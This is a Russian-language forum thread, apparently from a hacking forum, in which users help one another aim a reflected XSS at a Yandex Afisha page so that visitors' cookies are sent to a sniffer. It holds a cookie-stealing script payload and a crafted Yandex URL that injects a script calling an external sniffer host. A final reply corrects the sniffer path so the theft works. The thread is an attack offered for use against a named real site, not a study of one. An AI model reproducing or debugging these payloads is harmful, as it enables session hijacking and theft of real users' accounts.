Xss на яндексе... Требуеца помощь
 

Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать :)

http://forum.antichat.ru/thread19610.html

Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...

ЗА чем тебе писать или искать скрипт, просто на форуме есть тема где их выкладывают!

да я имею ввиду применение скрипта. ну допустим мне нада составить его так чтобы он таскал куки на мой снифер на античате. приведите мне пример на этой xss.

вобщем даже вот в чем суть вопроса- помогите составить корректный запрос чтобы с этого адреса куки уходили на сниффер...

На, лови:
Плюс не забудь ;)

Можешь соорудить что нибудь этакое
<script>document.location="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie</script>

вот соорудил я конструкцию такого вида

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript %20src=%22http://antichat.ru/s/мойсниф.jpg?%22+document.cookie;%3E%3C/script%3E

но отчеты не приходят.. видно гдето абшибся

Тык неправельно ты адрес задал, надо не ../s/yoursniff.jpg а .../cgi-bin/yoursnif.jpg